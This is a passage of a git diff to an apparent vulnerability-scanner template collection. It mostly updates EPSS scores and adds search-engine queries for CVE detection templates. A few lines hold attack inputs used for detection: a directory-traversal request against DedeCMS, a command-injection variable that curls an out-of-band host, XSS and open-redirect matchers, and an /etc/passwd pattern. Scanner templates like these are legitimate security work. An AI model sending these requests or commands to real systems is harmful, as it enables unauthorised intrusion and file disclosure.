4a0a00473045022100fc614c7ce6111ad91c84bd0aa0ea41a890f1011589191cb9bf421297dcb368c0022014a093e4b3f0c08bb8ae522059822568b1460a62461658ab6f3f0239ec6a8e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 28743e3369..b18db5b54b 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -20,14 +20,18 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: dotcms product: dotcms - shodan-query: http.title:"dotCMS" + shodan-query: + - http.title:"dotCMS" + - http.title:"dotcms" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: cve2018,cve,redirect,dotcms http: @@ -43,4 +47,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef42faf462b056809e87c56a2bd991601c0d4b37f9b1b0aa4e16c58a0cc1762802204ecf6513868b5bb6ce9f8b4a830ded2d3c2a660d9e27255179622995bacbc87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index c0b21f42aa..50e9de4953 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.96092 - epss-percentile: 0.99459 + epss-score: 0.95251 + epss-percentile: 0.9934 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kubernetes product: dashboard - shodan-query: product:"Kubernetes" + shodan-query: + - product:"Kubernetes" + - product:"kubernetes" tags: cve,cve2018,kubernetes,k8s,auth-bypass http: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220717d039ed3d0c44efc077565f10a9d632f99a68ce59eb9727eab144859504d19022010d4bff8932d9b2acb3d4bedcc622e8d3c1d07574b96f4be8007807b4aff57bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 64fb92a805..8210788332 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -21,13 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - epss-score: 0.9648 - epss-percentile: 0.99556 + epss-score: 0.95438 + epss-percentile: 0.99372 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 vendor: control-webpanel product: webpanel + shodan-query: http.title:"login | control webpanel" + fofa-query: title="login | control webpanel" + google-query: intitle:"login | control webpanel" tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss http: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220573467f2d253679a8ca0abe62ede74d07eb4b89953992c906843c11cad9a695e02201a0f31679a22b7dbe2e68ad75b65e94e48e09602d688d256fa627afd2f05dc5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 5ba6bb99ba..628e40044e 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.39642 + epss-percentile: 0.40792 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072a99586909e4df9893ddbe97f55ceea487163c8a6d2fa7bb1fd3f426fff0a31022100b894b36b035f3eb1fca2f1ff1dd4c79b5e5e1140d19e9ee8f1e90b9b36ac21e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index c9d46aecf6..5921121a41 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -20,15 +20,21 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54991 + epss-score: 0.001 + epss-percentile: 0.41301 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"DedeCms" + shodan-query: + - http.html:"DedeCms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + - http.html:"dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve2018,cve,dedecms,xss http: @@ -53,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ada522c6515fbef84bfe2b72a16b37eef4b726a80645ce815f8c839f8c3de084022100a9cee0e3010f2c7eab42fd53f0e934584477eeedaf5019a443621776728004e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010703c11bfff4211b5d3dd1e2a4c3470d072bbcb0d098ce3deb3d350cae0cc5f0220309d5e6e8303c24a00c176fc00478a874c05c4ce1f95e68265d988d135925efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index af06330091..834b7ac852 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -14,13 +14,15 @@ info: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18777 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - epss-score: 0.00224 - epss-percentile: 0.60675 + epss-score: 0.00185 + epss-percentile: 0.5564 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5bd07c891d0db92b2c4f1e4cbadea6203eafbdf92fabe4996837f51c1c865140221009130e54e81edb9b84222f0c1678adb7130f74463a53656948e28b6ad2491440e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae2a757ac5e3ef34ba3a5451c8125e2c7fe97fd9bef596f66376117e2764db670221008367fce471250198dca07e7745de56033b0108d5296706c7f9484ab47fed9ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 1b1f7330fd..4a7b985fa2 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -20,16 +20,21 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - epss-score: 0.17666 - epss-percentile: 0.96022 + epss-score: 0.39341 + epss-percentile: 0.97248 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: acme product: mini-httpd - shodan-query: 'Server: mini_httpd && 200' + shodan-query: + - 'Server: mini_httpd && 200' + - cpe:"cpe:2.3:a:acme:mini-httpd" + - "server: mini_httpd && 200" tags: cve,cve2018,lfi,mini_httpd,acme +flow: http(1) && http(2) + http: - method: GET path: @@ -40,6 +45,7 @@ http: part: header words: - "Server: mini_httpd" + internal: true - raw: - |+ @@ -57,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dde2f46dea081ad6ee497f625921fa627e85d86066f46bf0412c3baea3dee44c022100e29b218c3b2f0d942643f9520686a1c2ac7ffe7606193b38c7433e3006313eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5e8be66b2b1085f97e516f2ba33d738ffe158c9a3e81ed8fdcf861bf099274a022100a6523a54d37797bbfa2e1810af470add193798ad1aa0be028fe4d7e1040b1502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 32940d4fec..d8625a298d 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -21,15 +21,18 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18809 cwe-id: CWE-22 - epss-score: 0.43128 - epss-percentile: 0.97253 + epss-score: 0.50316 + epss-percentile: 0.97524 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true max-request: 1 vendor: tibco product: jasperreports_library - shodan-query: html:"jasperserver-pro" + shodan-query: + - html:"jasperserver-pro" + - http.html:"jasperserver-pro" + fofa-query: body="jasperserver-pro" tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco http: @@ -49,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100803bf8360cb7071f91b5033f54e04080f5ceb4dd645c8d7a14d652192cb130a8022020dd215c39c6d85861fe99504d663c6dfdc065fc06b02d3a73e325b842b014db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 568e65f5fe..dabb180f98 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -20,12 +20,17 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94612 + epss-percentile: 0.94736 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gogs product: gogs + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" + fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2018,gogs,lfi,rce,vulhub http: @@ -43,4 +48,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d79476c70fa102654cab950b22602f5882de9dfeac38e0a2759ebdf47848b0002210080ad77784df5e34a99efb752ce781684d27cda392d9c88371be16590782e9e60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 6439455c7b..13bedfdfac 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39294 + epss-score: 0.00072 + epss-percentile: 0.3103 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f031d999e765991f0aa2d1aae2aa9d4c79d9a3839f1dcf48b2c61a3f22a12a2a02202bbbf84485e9943cb9edeb0da4319e13626c70d6079238edafe328e4e16318fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index e3bf2d980e..398a9dc095 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 - epss-score: 0.37007 - epss-percentile: 0.96816 + epss-score: 0.36152 + epss-percentile: 0.97155 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,9 @@ info: vendor: ninjaforma product: ninja_forms framework: wordpress + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma http: @@ -59,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017ffefd669f716542939f3fbf7cb21c395e7c7444f9c185954a4b4d3f5db6f09022100960d179e7780f639d861a3b9a8d4a7186dc971253532f6ecf8aaaee57396e1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d51eff5c4659c4fd0d5106f31182c5ebc798e84bbb4572f10adf0f01d61771ca02200a2522b02dbb45f65e4f8ebbb3d857d0a98c3b467de192bb0a256222a13a3a10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 783a9f2a6f..e9a3c267e5 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -21,15 +21,18 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19326 cwe-id: CWE-22 - epss-score: 0.01158 - epss-percentile: 0.83304 + epss-score: 0.00845 + epss-percentile: 0.82119 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zyxel product: vmg1312-b10d_firmware - shodan-query: http.html:"VMG1312-B10D" + shodan-query: + - http.html:"VMG1312-B10D" + - http.html:"vmg1312-b10d" + fofa-query: body="vmg1312-b10d" tags: cve2018,cve,lfi,modem,router,edb,zyxel http: @@ -48,4 +51,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0b256edd487a4e35692ced0880977fb54adc0c0c2c0104435696e447edf167d022100c839934f8b9be8f49836ed75711777736cb85e7e81d1380fdb8f7bf5373de4a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 2b040cfd71..b3d26da509 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -26,6 +26,11 @@ info: max-request: 1 vendor: wowza product: streaming_engine + shodan-query: + - http.title:"manager" product:"wowza streaming engine" + - cpe:"cpe:2.3:a:wowza:streaming_engine" + fofa-query: title="manager" product:"wowza streaming engine" + google-query: intitle:"manager" product:"wowza streaming engine" tags: cve2018,cve,wowza,lfi http: @@ -43,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065a911e4817469f0fbb48b8f3f0364ed15260bc4b970a52c536ea3b0b7d172a8022100d616870d8e78df9250965cdffbc0fc0773d1a7e7445ad7e44e713526627905bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index fee4a77a5f..7fbd5422cb 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.53963 + epss-percentile: 0.54797 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb661a6ea402a8fe1df0ba6f686efa2e17994e84eb11f9c17383364f88f285880220308c0de4c8f2b5e65feb3809c645cc919a6494252251cc678e86295fca8383a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7e6ee6c4a5dacc72f204038317f3d576080fb833cb02aab58fb9a32ac0339ed0220684eb3d85d15b9ecff6fc2978c4574372dc3adf26c14c12edff24287e95f6c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 509be08df3..617694b8dd 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19439 cwe-id: CWE-79 - epss-score: 0.00548 - epss-percentile: 0.76986 + epss-score: 0.0038 + epss-percentile: 0.72872 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,4 @@ http: part: body words: - "" # Random string as HTML comment to append in response body @@ -80,4 +82,4 @@ http: part: body_3 words: - "{{html_comment}}" -# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d78f448652ff480069cb03b1f78fb30af1a9ca0de10eecd5f19fbfaaa56bb5e0022100f8786009ae87cd3ba31b6cf55149153420a85aa9d61b51abf28cd80fc099fb9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 4783e1fe8b..2583aa00c9 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-2009 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.3232 + epss-score: 0.00099 + epss-percentile: 0.41053 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -61,4 +61,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' -# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6f372018946b3beaebd415920a5e6d1d8e71304811c3e7a1c1222e5e7a86604022012cbef1c55c540370121766fc643289378a91577e7f87e46421634f256235c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 1f3d57af08..b9e6b6dc4d 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 - epss-score: 0.00374 - epss-percentile: 0.722 + epss-score: 0.00302 + epss-percentile: 0.69552 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and -# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffbdca1dcfe309a8d8b09ff9fadc17e0082cd9a9841a9576be790a6570c9cffb022100bb9aa9a7bd2885181381d4c61929384437cb98432da45a3d913dd03bc1fdf7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml new file mode 100644 index 0000000000..1d9f84e7c8 --- /dev/null +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -0,0 +1,55 @@ +id: CVE-2023-2059 + +info: + name: DedeCMS 5.7.87 - Directory Traversal + author: pussycat0x + severity: medium + description: | + Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter. + reference: + - https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md + - https://vuldb.com/?ctiid.225944 + - https://vuldb.com/?id.225944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-2059 + cwe-id: CWE-28 + epss-score: 0.0012 + epss-percentile: 0.46305 + cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dedecms + product: dedecms + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - app="DedeCMS" + - app="dedecms" + - body="dedecms" + tags: cve,cve2023,dedecms,lfi + +http: + - raw: + - | + GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "dirname(__FILE__)" + - "$cfg_basedir" + - "dedecms" + condition: and + case-insensitive: true + + - type: status + status: + - 200 +# digest: 490a0046304402201d0c6e100044fdde3998231bae6f6cbe3bec52a4aba56ad08ce532b7ed60d51602200d13686fedd840e2d62e31cc95af0a1deaf172631bd8b39d815cfe7e497a8a9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 98345d1968..d2d36d9a11 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -19,15 +19,19 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.29094 - epss-percentile: 0.96766 + epss-score: 0.25579 + epss-percentile: 0.96694 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vmware product: aria_operations_for_logs - shodan-query: title:"vRealize Log Insight" + shodan-query: + - title:"vRealize Log Insight" + - http.title:"vrealize log insight" + fofa-query: title="vrealize log insight" + google-query: intitle:"vrealize log insight" tags: cve2023,cve,vmware,aria,rce,oast http: @@ -63,4 +67,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4ea8611e5fbfefbfc93aeb709594cb1c4910d380bb601f437c6a7c326662f6f02203e5f2a223540ba51e701c51b48de8e16b091ee2dddfeb4a85ffb2efe8c645560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 5c4d6d49fd..6cd4ba8e0e 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -22,16 +22,25 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 - epss-score: 0.96408 - epss-percentile: 0.99538 + epss-score: 0.9635 + epss-percentile: 0.99552 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware vRealize Network Insight" - fofa-query: title="VMware vRealize Network Insight" + shodan-query: + - title:"VMware vRealize Network Insight" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="VMware vRealize Network Insight" + - title="vmware aria operations" + - title="vmware vrealize network insight" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" @@ -67,4 +76,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e864773eddb8c8ec09b5cd29b83fd3f6e6fc6e287d43eae34fd5cdb84d72582022100c46384f56ddceb399e236f6c57c228570f822d585c50acde1b2f9a82770c10cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 861f3de03f..372165ca29 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -18,15 +18,24 @@ info: cvss-score: 8.8 cve-id: CVE-2023-20888 cwe-id: CWE-502 - epss-score: 0.35911 - epss-percentile: 0.96766 + epss-score: 0.21995 + epss-percentile: 0.96459 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware Aria Operations" + shodan-query: + - title:"VMware Aria Operations" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="vmware vrealize network insight" + - title="vmware aria operations" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: @@ -65,4 +74,4 @@ http: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true part: body -# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba20a54a3a432df111348f25e911ec92d24abda137079f61775ecb964fa283eb022067d7d3b2b7c8063c4a7317c97ed7d3112d37e62ade88166e98f93e8d84ec5522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 03cddd74fc..3adf958c8d 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -19,15 +19,24 @@ info: cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 - epss-score: 0.09004 - epss-percentile: 0.94043 + epss-score: 0.37918 + epss-percentile: 0.9721 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware Aria Operations" + shodan-query: + - title:"VMware Aria Operations" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="vmware vrealize network insight" + - 